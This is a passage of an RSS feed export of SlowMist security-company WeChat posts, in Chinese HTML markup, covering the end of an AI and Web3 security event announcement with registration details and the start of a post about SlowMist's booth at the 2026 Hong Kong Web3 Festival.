[]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;docs-internal-guid-0b5424bd-7fff-3f32-0b6a-66c5277d4278&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">具体议程</span></span></p><p data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;docs-internal-guid-0b5424bd-7fff-3f32-0b6a-66c5277d4278&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">活动的议程如下：</span></span></p></b></b></b></b></b></b></b></b></b></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_jpg/8z8bibAexaCLc9NJytiayxnD8iaz5icZPqJS2p2SoLWVX3Rj0iaaPlTVwKuQuoh3hQuibxLcz9Nfkkbs0y7Urj5xV83ZiagIkuVVS6LxCI07eiaajfM/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="197" data-cropsely2="868" data-imgfileid="100021077" data-ratio="4.4" data-s="300,640" style="margin-left: 0px;margin-top: 0px;" data-type="jpeg" data-w="1000" src="https://wechat2rss.xlab.app/img-proxy/?k=22d6d04b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCLc9NJytiayxnD8iaz5icZPqJS2p2SoLWVX3Rj0iaaPlTVwKuQuoh3hQuibxLcz9Nfkkbs0y7Urj5xV83ZiagIkuVVS6LxCI07eiaajfM%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p data-start="132" data-end="219" data-pm-slice="0 0 []" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">慢雾安全团队也将在现场分享最新研究成果，携手安全研究、法律合规、产业实践等多领域专家共同探讨 AI &amp; Web3 安全与合规的未来演进路径。</span></span></p><p data-start="132" data-end="219" data-pm-slice="0 0 []" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: normal;"><span textstyle="" style="font-size: 24px;font-weight: bold;">参与方式</span></span></p><p data-path-to-node="5" data-pm-slice="0 0 []" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本次活动为免费参与，现已开放报名。</span></span><span leaf=""><br/></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">报名链接：<a href="https://luma.com/xzvvovvf（或点击文末“阅读原文”直接跳转）" target="_blank">https://luma.com/xzvvovvf（或点击文末“阅读原文”直接跳转）</a></span></span><span leaf=""><br/></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">注：受场地容量限制，本次活动名额约 100 人，席位有限，建议尽早完成报名。</span></span></p></div><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504713&amp;idx=1&amp;sn=b3c6dee54d890e1751ac7bb28d28bc74&amp;scene=21#wechat_redirect" textvalue="慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504627&amp;idx=1&amp;sn=9669acd8ecce92eccc5a6c188286510c&amp;scene=21#wechat_redirect" textvalue="暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）" data-itemshowtype="0" linktype="text" data-linktype="2">暗网情报技术能力框架及参考指标体系（指导性技术文件2026版）</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504616&amp;idx=1&amp;sn=95677483334baedb3127bdc0911fa2f8&amp;scene=21#wechat_redirect" textvalue="慢雾：如何评估加密反洗钱工具的有效性" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾：如何评估加密反洗钱工具的有效性</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504607&amp;idx=1&amp;sn=49e70d092b5e2e4d7278e85d822643f8&amp;scene=21#wechat_redirect" textvalue="活动回顾｜慢雾创始人余弦出席首届 Agentic AI 创新与安全论坛" data-itemshowtype="0" linktype="text" data-linktype="2">活动回顾｜慢雾创始人余弦出席首届 Agentic AI 创新与安全论坛</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504594&amp;idx=1&amp;sn=88d0a2ea27ea5f4bd87967e3411848f6&amp;scene=21#wechat_redirect" textvalue="Odaily专访余弦：Anthropic核弹级新模型泄漏，如何影响加密安全攻防？" data-itemshowtype="11" linktype="text" data-linktype="2">Odaily专访余弦：Anthropic核弹级新模型泄漏，如何影响加密安全攻防？</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img class="rich_pages js_insertlocalimg wxw-img" data-aistatus="1" data-cropselx1="0" data-cropselx2="578" data-cropsely1="0" data-cropsely2="1973" data-fileid="100009827" data-ratio="3.9814814814814814" data-s="300,640" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=81074fc1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FqsQ2ibEw5pLbEP8f4tadFenoLauzHpicWdWbVap3aia38LUGPflBho9ibDHXjoG5fecGJSaYa4S4zYdoicXibSmjv9tg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://luma.com/xzvvovvf">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=e57a1d8c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504728%26idx%3D1%26sn%3D2e9d14cd251484f86669e24458daafb6">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 15 Apr 2026 16:24:00 +0800</pubDate>
    </item>
    <item>
      <title>慢雾邀您共赴 2026 香港 Web3 嘉年华及多场行业盛会</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504713&amp;idx=1&amp;sn=b3c6dee54d890e1751ac7bb28d28bc74</link>
      <description>期待在香港与您相见，共同推动 AI &amp; Web3 安全前行！</description>
      <content:encoded><![CDATA[<p><span>慢雾安全团队</span> <span>2026-04-13 19:32</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=2cea242e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCIfC6JflnqnSofuiba5q16TdD89vicLRWsiceUggjOYZuH1gwOHuzywujbRoThH6Bjk8FqfrzyVxxmT2AcxLcBia1zNfjcKNadOpib8%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>期待在香港与您相见，共同推动 AI & Web3 安全前行！</p>
  <p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">随着 2026 香港 Web3 嘉年华的临近，全球区块链行业的目光再次聚焦于这座国际化都市。作为全球领先的区块链安全公司，慢雾(SlowMist) 将于 4 月 20 日至 23 日参与、举办一系列活动，并将在多场论坛与圆桌中分享我们的安全研究成果，期待与全球 Web3 从业者深入交流，共同推动行业安全建设。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021002" data-ratio="0.562962962962963" width="547" data-type="jpeg" data-w="1080" height="308" style="margin-left: 0px;margin-top: 0px;width: 528px;height: 297px;" src="https://wechat2rss.xlab.app/img-proxy/?k=5a29ec2d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCK8IKZHzqaOZXesrbWYX6OqYRElngZgyGechCsgibSWRgcibQ9zC3T6DKhpxHLzmEfv0hr1OibAd1G3JNHR0Fsc9xh8yuucxrW3Jg%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p></b></b></b></b></p><div><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">2</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">026 香港 Web3 嘉年华</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2026 年 4 月 20 日 - 23 日，由万向区块链实验室、HashKey Group 联合主办，W3ME 承办的香港 Web3 嘉年华将在香港会议展览中心举办。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021001" data-ratio="0.5625" width="530" data-type="jpeg" data-w="1600" height="299" style="margin-left: 0px;margin-top: 0px;width: 530px;height: 298px;" src="https://wechat2rss.xlab.app/img-proxy/?k=9067073c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCLv8HZNMhXdibcfT3FsOAUrnOW1RunOasicwufuaOl2uoMeT9qCCQNJPEu2Jet86sdx5t0zGibKaMiaz4HRLfK7Uh4bUjtNmibxHKok%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="line-height: 1.38;white-space: pre-wrap;font-size: 16pt;font-family: Roboto, sans-serif;color: rgb(0, 0, 0);background-color: transparent;font-weight: 300;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 20px;font-weight: bold;">展位信息</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">作为本次活动的一级赞助商，慢雾(SlowMist）将在主会场 F07 展位迎接全球 Web3 从业者，与大家共同探讨 AI &amp; Web3 安全的最新动态与挑战。</span></span></p></b></b></b></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">时间：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4 月 20 日 ~ 23 日</span></span></b></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">展位：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">F07</span></span></b></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">地点：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">香港国际会议展览中心 5BCDE 馆</span></span></b></b></b></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5705765407554672" data-s="300,640" data-type="png" data-w="2012" type="block" data-imgfileid="100021024" src="https://wechat2rss.xlab.app/img-proxy/?k=c986fa06&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJeHWnw5YyEYNPgbn7ibmlEBKLUf7ymkMcguLg8uZfbrf30sD9oPaPfGDK53QP7Ks2z3qVyFia4DUERr9icjZJicDYA0iaDo2KtCLGo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span 